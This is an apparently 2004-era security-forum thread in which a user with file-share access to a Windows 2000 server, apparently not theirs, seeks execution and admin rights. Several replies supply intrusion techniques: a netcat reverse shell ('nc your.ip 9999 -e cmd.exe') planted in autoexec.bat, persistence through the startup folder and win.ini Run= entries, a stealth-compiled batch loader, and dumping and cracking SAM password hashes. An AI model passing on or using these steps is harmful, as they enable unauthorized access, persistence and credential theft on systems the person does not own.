i have access to c$ / d$ and admin$ on my box, can upload see and download every file, but have no rights to execute, is there any possibility to get this rights with downloading sommething of this system perhaps to get admin axx ?!
help would be very n1 !!
mfg
buzzons
Jun 23 2004, 10:37 PM
psexec?
SeNSeMaNN
Jun 23 2004, 10:38 PM
i said that i can´t execute ;o( what do you mean ?!
slynx
Jun 24 2004, 12:27 AM
ooo....such angry people on this forum :>
if you can wait untill the box reboots, you could place a file inside the startup folder, which is a technique used by worms like BugBear.....
other than that and the obvious exploitation of open netbios vulnerabilities....no, i don't think so ;p
gilbert0
Jun 24 2004, 09:56 AM
First of all, there are no stupid questions, just stupid people. There is an answer to your question:
You just put your commands in autoexec.bat and wait till the pc reboots. A well performed google search should provide you with more information. that way you could set up a netcat listening on your pc nc -l -p9999 -vv
and include this command in autoexec.bat nc your.ip 9999 -e cmd.exe
This should give you a cmd shell when the pc reboots. (You would have to upload nc.exe first).
I hope this helps,
Gilbert
Partizaan
Jun 24 2004, 10:20 AM
Conntect to the box with dameware Utililities An psexec like shell is included.
I guess u have pass and login ? If u have that it is plain simple netbios hack.
SeNSeMaNN
Jun 24 2004, 10:51 AM
hehe not so easy guys....
1.) i am not stupid 2.) port 139 is closed and netbios is off..... 3.) cause of 2.) dameware nt does not work 4.) i have a non administration axx 5.) i have c$ and d$ and admin$ access to the machine but not to every folder.... 6.) have full upload and download winnt directory root.. 7.) if i would place a netcat.bat in the startup folder which startup folder do i have to use ?? default user ?? 8.) psexec = not enough permissions ! access denied !
you see that it is not that kind of easy.....
mfg sense
SnakO
Jun 24 2004, 10:51 AM
yeah,
use dameware or psexec..
that nc works too or just create a .bat in on C: and let that execute on startup
then if you search this forum you can enter commands in that bat to make another admin user.. etc. like that you can login with your own password.. and give yourself exec rights
nolimit
Jun 24 2004, 11:33 AM
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
allik
Jun 24 2004, 11:58 AM
QUOTE (nolimit @ Jun 24 2004, 11:33 AM)
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
would be quite difficult to do this without exec rights but you can try this
CODE
net user Administrator *
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said its your box so that would't be a problem
SeNSeMaNN
Jun 24 2004, 12:46 PM
QUOTE (allik @ Jun 24 2004, 11:58 AM)
QUOTE (nolimit @ Jun 24 2004, 11:33 AM)
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
would be quite difficult to do this without exec rights but you can try this
CODE
net user Administrator *
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said its your box so that would't be a problem
yes but how to do this without shell ?!
QUOTE
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords
no chance because of missing exec rights...... !! i have no ftp access only through \\server\c$
mfg
allik
Jun 24 2004, 12:54 PM
damn your right my fault so you have to do the method with reboot
SeNSeMaNN
Jun 24 2004, 12:56 PM
QUOTE (allik @ Jun 24 2004, 12:54 PM)
damn your right my fault so you have to do the method with reboot
yes but there is still the question which startup folder i have to use !!
this folder ?
\\server\c$\Documents and Settings\Default User\Menu Démarrer\Programmes\Démarrage
or this one ?
\\server\c$\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
dont-staY
Jun 24 2004, 01:32 PM
The following are files that programs can autostart from on bootup:
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup Windows NT C:\wont\Profiles\All Users\Start Menu\Programs\Startup Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
SeNSeMaNN
Jun 24 2004, 03:18 PM
QUOTE (dont-staY @ Jun 24 2004, 01:32 PM)
The following are files that programs can autostart from on bootup:
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup Windows NT C:\wont\Profiles\All Users\Start Menu\Programs\Startup Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
so i can put my netcat.exe and netcat.bat into the all user startup folder ????? or should i only add a shortcut to the startup folder and the files perhaps into the system32 folder ?!
p.s.: cant find the winstart.bat and dosstart.bat on the system !!!!!
SeNSeMaNN
Jun 24 2004, 03:57 PM
hm, no upload access to Documents and Settings ;o( any other idea what to do ?!
T3cHn0b0y
Jun 24 2004, 05:17 PM
Get that (filtered) sam file! Rip the bitch from C:\WINNT\Repair shove it on your own box, pwdump the password hashes and crack the fuckers with LC mother (filtered) 4!
Peace
T3cHn0b0y
Jun 24 2004, 05:18 PM
Sorry man I'm feelin wierd
SeNSeMaNN
Jun 24 2004, 05:34 PM
fucki* access denied on the sam file o_O
allik
Jun 26 2004, 10:24 AM
just do it like that echo start c:\mynetcatpath\nc.exe>>c:\windir\win.ini
then wait/hope for reboot and your netcat is started
SeNSeMaNN
Jun 26 2004, 03:03 PM
you mean to netcat.bat !!??? echo without cmd ?! interesting.........
i can open and save the win.ini file... so what do i exactly have to add there ??!
Icingtaupe
Jun 27 2004, 04:34 PM
[Edit]
Erf, you can edit the Win.ini ... type [windows], or under the [windows]section, type "Run=yourexe.exe", in this case the command for netcat, read before In the next startup, netcat will be run and give you a shell
[/edit]
Well...
Can you modify the Win.ini ? Or The system.ini ?
If you can, just upload your netcat, create a bat wich you compile into a .exe ( no shell used in this manner ) ( Use StealthBatch to compile it into an exe ), type the command [boot] or [windows] followed by your file ( nclaunch.exe, why not ) and it will make a stealth load of your exe ...
Another try, can you modify YOUR system.ini, upload and then replace the remote file ? It's an idea....
So much effort from so many people that wanted to help for one f****d servu?Weird...
SeNSeMaNN
Jun 27 2004, 07:03 PM
QUOTE (strasharo @ Jun 27 2004, 05:48 PM)
So much effort from so many people that wanted to help for one f****d servu?Weird...
its just a simple ftp, and one of the smallest... why not to get ftp root ?!
QUOTE
So much effort
yes, and i am very happy about it.... but such a post like yours is really (filtered)** up.. and doesn´t help.... so go home to your mummi and flame there..
strasharo
Jun 27 2004, 08:49 PM
Blah,better close your mouth.I`m bored of serv-u kids jumping around and making havoc...So better go to dig some potatoes...
strasharo
Jun 27 2004, 08:49 PM
Blah,better close your mouth.I`m bored of serv-u kids jumping around and making havoc...So better go to dig some potatoes...
Icingtaupe
Jun 28 2004, 11:22 PM
QUOTE (strasharo @ Jun 27 2004, 05:48 PM)
So much effort from so many people that wanted to help for one f****d servu?Weird...
I don't know how you work, Strasharo, but I'm here to help people and make them projects works, not to say "Sh***, this iz an useless topic, whY do u help him ?"...
I think your post is useless, in fact... or, maybe you want to make people angry, them, continue like this, but I really think this is useless...
Well, his projetc works ? He have a root access on the boxe ? Well, if it does, i think the topic can be terminated... but posting to say "if i was in your shoes, i might not help him"... it's stupid ... let him do what he want, and let us do what we want, if we have time to loose for other people and help them, I think it's better than have time to loose to don't help people and say what you say ...
That's all, I can go out, now...
Edit : Hu, and I'm bored about people that tell them better than other and don't help others...
Forget my English, it's not my native language...
cougar
Jun 28 2004, 11:56 PM
why do people get upsed about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.
So why not help eachother, if you don't like the thread, --> dont reply?
SeNSeMaNN
Jul 4 2004, 08:29 AM
QUOTE (cougar @ Jun 28 2004, 11:56 PM)
why do people get upsed about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.
So why not help eachother, if you don't like the thread, --> dont reply?
thats my opinion too. just wanna have ftp root access so i want to do it this way... but what about my winini mmodification, is it now correct or wrong ?!
just want to be sure that my system starts correctly ,because i don´t wanna use the whole day to set up a new win2000 server
hmmmmmmm
something to win.ini and system.ini my system has got win2000. and the win.ini and the system.ini are for 16 bit support! does win2000 use these things ?!
what can i put into autoexec.bat ?! o_O
mfg
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
In the next startup, netcat will be run and give you a shell 
